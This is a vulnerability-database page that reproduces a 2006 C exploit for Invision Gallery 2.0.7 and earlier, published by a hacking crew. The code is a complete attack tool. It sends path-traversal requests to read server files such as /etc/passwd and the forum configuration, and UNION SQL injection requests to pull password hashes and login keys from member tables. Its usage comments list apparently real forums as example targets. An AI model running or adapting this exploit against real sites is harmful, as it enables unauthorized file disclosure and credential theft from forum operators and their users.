Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)

🗓️ 12 Oct 2006 00:00:00Reported by ShadOSType 
zdt
 zdt🔗 0day.today👁 40 Views

Invision Gallery <= 2.0.7 exploits allow ReadFile and SQL injection attacks on Linux systems.

Code
====================================================================
Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)
====================================================================



/*
     _  _     _ _ _  __     _      _   _
    | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
    | __ / -_) | | ' <| ' \| / _` | ' \  _(_-<
    |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
      hellknights.void.ru    |___/  
                 (c)oded by _1nf3ct0r_ (Windows), ported by ShadOS(Linux)

 Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit
 
+-------------+
|   Uzage:    |
+-------------+
[+] ReadFile():
  - syntax:
  readfile 1 <host> <pathtoindex> <localfile> 
  readfile 2 <host> <pathtoindex> <localfile>  // try it if readfile[1] failed ;)
   - params: 
  <localfile> -  path to local file (../file), for example: ../../../../../etc/passwd
   s0, if u want to get local path to IPB try this: ../../hellknightscrewxploit :) 
   - examples:
   readfile 1 asd.ru index.php ../../../../../../etc/passwd
   readfile 1 asd.ru forum/index.php ../../conf_global.php
   readfile 1 asd.ru forum/index.php ../../conf_global.php%00
   
[+] SQL-injection:
  - syntax
  sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>
  getprefix <host> <pathtoindex>   // get database prefix from IPB error :) 
  - params:
  <member_id> -  member's id for SQL-injection result, for example: 1
  <column>    -  ipb members' column to get. for example: ip_adress, email.
  <table>     -  ipb table to use. for example: member
  <prefix>    -  database prefix. 
  - examples:
  ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1  
  ig.exe sqlinject asd.ru index.php member_login_key  ibf_ members 1
  ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5
  
[~] sorry, but i`m too lazy 2 optimize this c0de... 
[~] Music: Orbital - Halcyon and On and On (OST Hackers) :) 
[~] compiled with LCC(Windows), gcc 4.1.1(Linux) without any warnings

Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team 
             itz public c0de n0w, have phun :> 
./ig sqlinject linuxforum.ru index.php member_login_key ibf_ members 1
./ig readfile 2 .ru index.php ../../../../../../../../../etc/passwd
./ig sqlinject forum.pesni.ru index.php member_login_key ibf_ members 1
*/


#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <resolv.h>
#include <errno.h>
#include <netdb.h>

#define MAXBUF  1024

int Exploit(char * sendbuffer, char * mode, char * host)
{
	char recvbuffer[10024]; 
	memset(recvbuffer,0,10024);

	char * temp; 
	struct  hostent *hostname;

	int s;
	if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) return -1;
	struct sockaddr_in webaddr;
	bzero(&webaddr, sizeof(webaddr));
		webaddr.sin_family = AF_INET;
		webaddr.sin_port = htons(80);
		hostname = gethostbyname(host);
		if (hostname) {
			memcpy(&webaddr.sin_addr, 
			hostname->h_addr,
			hostname->h_length);
		} else { return 1; }
	if (connect(s, (struct sockaddr *)&webaddr,sizeof(webaddr))) return -1;
	send(s, sendbuffer, strlen(sendbuffer),0);
	
	int i, j;
	while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) 
	for(i = 0; recvbuffer[i]!=0; ++i)
	{
		if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&&
			(recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n'))
		{temp = (char*)&recvbuffer[i] + 4;break;}
	}	
	if(strcmp(mode,"readfile")==0)
	{
		printf("\n [+] Exploit Result:\n\n%s", temp);
		return 0;
	}
	if(strcmp(mode,"sqlinject")==0)
	{		
		char * token = NULL; 
		char * injected = NULL; 
		char * parse = NULL;
		token = strtok(temp, "="); 
		token = strtok(NULL, "=");
		token = strtok(NULL, "&");
		token = strtok(NULL, "&");
		for(j = 0; j < 2; j++)
		{
    		token = strtok(NULL, "&");
			if(j==1){ injected = token; printf("\n [+] Exploit Result:\n\n%s", injected); }
		}
	} else { printf("\n[-] some error. change MODE param\n"); return 0; } 
	close(s);
	return 0;
}

int main(int argc,char * argv[])
{
	printf("\n ...............................................................\n");
    printf("  Invision Gallery 2.0.7 ReadFile() & SQL injection exploit       \n");
    printf("         (c)oded by _1nf3ct0r_ // Hell Knights Crew               \n");
    printf("       ported by ShadOS(Linux) // Hell Knights Crew               \n");
	printf("               http://hellknights.void.ru/                        \n");
	printf("  Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team   \n");
	printf(" ...............................................................  \n");		
	
	if (argc == 1) {
    printf("\n\n [+] ReadFile():\n");
    printf("  - syntax:\n");
    printf("  readfile 1 <host> <pathtoindex> <localfile> \n");
    printf("  readfile 2 <host> <pathtoindex> <localfile>   -- try it 1f readfile[1] failed \n");
    printf("  - params: \n");
    printf("  <localfile> -  path to local file (../file), f0r example: ../../../../../etc/passwd\n");
    printf("  s0, 1f u want to get local path to IPB 7ry th1s: ../../hellknightscrewxploit  \n");
    printf("  - examples:\n");
    printf("  readfile 1 asd.ru index.php ../../../../../../etc/passwd\n");
    printf("  readfile 1 asd.ru forum/index.php ../../conf_global.php\n");
    printf("  readfile 1 asd.ru forum/index.php ../../conf_global.php%00\n\n\n");
    printf(" [+] SQL-injection:\n");
    printf("  - syntax\n");
    printf("  sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n");
    printf("  getprefix <host> <pathtoindex>   -- get database prefix from IPB error  \n");
    printf("  - params:\n");
    printf("  <member_id> -  member's id for SQL-injection result, for example: 1\n");
    printf("  <column>    -  ipb members' column to get. for example: ip_adress, email.\n");
    printf("  <table>     -  ipb table to use. f0r example: member\n");
    printf("  <prefix>    -  database prefix. \n");
    printf("  - examples:\n");
    printf("  ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1  \n");
    printf("  ig.exe sqlinject asd.ru index.php member_login_key  ibf_ members 1\n");
    printf("  ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5\n\n");
	return 1;
	}

// --- readfile() exploit --- //
char * mode = argv[1];
char exploit[1024];
if (strcmp(mode,"readfile")==0)
{ 
	char * type = argv[2];
	char * path = NULL; path = argv[4];
	char * localfile = argv[5];
	char * host = argv[3]; 
	if (strcmp(type,"1")==0)
	{ 
	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?act=module&module=gallery&cmd=viewimage&img=&file_type=&dir=");
	strcat(exploit, localfile);
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
	Exploit(exploit, "readfile", host);
	} 
	else if (strcmp(type,"2")==0)
	{ 
	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?act=gallery&code=viewimage&img=index.gif&dir=");
	strcat(exploit, localfile);
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
	Exploit(exploit, "readfile", host);
	}

// --- sql-injection exploit --- //
} 
if(strcmp(mode,"sqlinject")==0)
{
	char * host = argv[2]; 
	char * path = argv[3];
	char * prefix = argv[5];
	char * column = argv[4];
	char * table = argv[6];
	char * id = argv[7];

	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,");
	strcat(exploit, column);
	strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20");
	strcat(exploit, prefix);
	strcat(exploit, table);
	strcat(exploit, "%20WHERE%20id=");
	strcat(exploit, id);
	strcat(exploit, "/*31337*/");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
    Exploit(exploit, "sqlinject", host);
} 
if (strcmp(mode,"getprefix")==0)
{ 
	char * path = argv[3];
	char * host = argv[2]; 

	strcpy(exploit, "GET /"); 
	strcat(exploit, path); 
	strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew");
    strcat(exploit, " HTTP/1.0\r\nHost: ");
	strcat(exploit, host); 
	strcat(exploit, "\r\n\r\n"); 
	printf("\n\n\n[!] u can get database prefix from this error. example: SELECT * FROM <PREFIX>gallery_albums\n\n");
	Exploit(exploit, "readfile", host);
	printf("\n\n");
}
	return 0;
}



#  0day.today [2018-02-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Oct 2006 00:00Current
7.1High risk
Vulners AI Score7.1
invision galleryreadfile exploitsql injectionlinux systemsfile accessdatabase security.
40